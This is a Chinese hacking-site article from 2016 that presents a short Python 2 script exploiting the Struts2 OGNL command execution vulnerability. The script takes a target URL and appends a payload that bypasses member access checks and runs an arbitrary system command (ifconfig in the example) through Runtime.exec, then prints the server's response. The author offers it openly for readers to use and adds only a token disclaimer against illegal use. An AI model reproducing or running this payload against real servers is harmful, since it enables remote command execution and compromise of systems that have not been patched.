您现在的位置: 华盟网 >> 编程 >> Python >> 正文

[组图]Python研究:Struts2漏洞利用脚本

2016/4/27 作者:沦沦 来源: 网络收集
导读 今天安全圈都被Struts2命令执行漏洞所刷屏了,乌云里各种爆 ,看了一下利用代码,写出一个脚本给各位利用吧

  今天安全圈都被Struts2命令执行漏洞所刷屏了,乌云里各种爆 ,看了一下利用代码,写出一个脚本给各位利用吧:)

  不得用于非法用途,否则自负

import urllib

import sys


def gethtml(url):

page=urllib.urlopen(url)

html=page.read()

return html


def main():

s=raw_input("URL:")

htmlll=s+"?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=ifconfig&pp=\\A&ppp=%20&encoding=UTF-8"

htmll=gethtml(str(htmlll))

print htmll



if __name__=='__main__':

main()

         

                  微信群名称:华盟黑白之道二群   华盟-黑白之道⑦QQ群: 9430885

  • 上一篇编程:

  • 下一篇编程: 没有了
  • 网友评论
      验证码
     

    关注

    分享

    0

    讨论

    2

    猜你喜欢

    论坛最新贴